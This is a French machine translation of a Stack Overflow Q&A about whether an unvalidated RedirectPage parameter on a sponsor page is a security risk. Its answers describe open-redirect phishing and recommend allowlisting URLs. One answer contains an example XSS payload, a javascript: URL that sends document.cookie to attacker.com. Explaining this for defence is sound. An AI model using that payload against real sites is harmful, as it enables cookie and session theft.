Pouvez-vous trouver le problème de sécurité Web ici?
https://stackoverflow.com/questions/210820
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianQuestion
J'ai une page Web qui redirige vers une autre page Web comme celle-ci:
http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
Ensuite, la page Sponsor.php affiche une annonce avec un lien indiquant "Continuer vers votre page". qui relie au passé dans RedirectPage. Y at-il des problèmes de sécurité / usurpation qui pourraient en découler? Quelle est la meilleure façon de gérer cela? (notez que l'utilisateur n'est connecté à aucun des sites)
La solution
C'est un gros problème. Si je vous envoie un lien qui ressemble à ceci:
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
Vous allez penser "Oh, CNN, c'est un site légitime", et vous l'ouvrirez, puis cliquez sur le lien "Continuer vers votre page". Et puis, vous serez sur l’un des sites pornographiques les plus répugnants du Net et vous entendrez une voix masculine géante en plein essor qui sera annoncée à tous vos collègues "Hot Damn I Want to!" @ $ @ # $ Votre ! (& amp; & # 164; & amp; ^ $ & # 167; jusqu'à ce que je ne puisse pas & # 161; & # 8976; ^ (! # ~~ & $ ^ #! @ $ !! ". ; et vous devrez expliquer à votre patron "Je pensais que c’était CNN!"
Le trou ici est votre réputation . Les redirections aveugles comme celle-ci sont dangereuses.
Et ce n'est qu'un trou. Qu'en est-il de cela?
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
Maintenant, j'ai XSS-ed votre site et volé les cookies de votre utilisateur. Bien sûr, vous dites qu'il n'y a pas d'informations de connexion, mais qu'en est-il des données de session? Ou lorsque vous ajoutez un identifiant ultérieurement, ou que quelqu'un de votre entreprise utilise cette page un an plus tard, où les utilisateurs sont connectés.
Autres conseils
C’est définitivement un risque pour la sécurité. Évitez d’utiliser des variables d’URL lorsque la sécurité est en jeu.
Bien que rien ne soit totalement sécurisé, il s'agit d'un moyen bien plus efficace de traiter ce problème: http: //www.webmasterworld.com/forum88/2910.htm
Si sponsor.php autorise toute valeur dans RedirectPage ET que les publicités impliquent un endossement ou encouragent les internautes à penser qu'elles sont sur la bonne voie, vous l'inclineriez dans le cadre d'une attaque de phishing. Pire encore, vous profiteriez probablement de ces attaques, ce qui rendrait probablement les gens plutôt mécontents.
Le fait de conserver une liste des URL autorisées (ou des modèles qu’ils peuvent suivre) contribuerait grandement à éviter les problèmes.
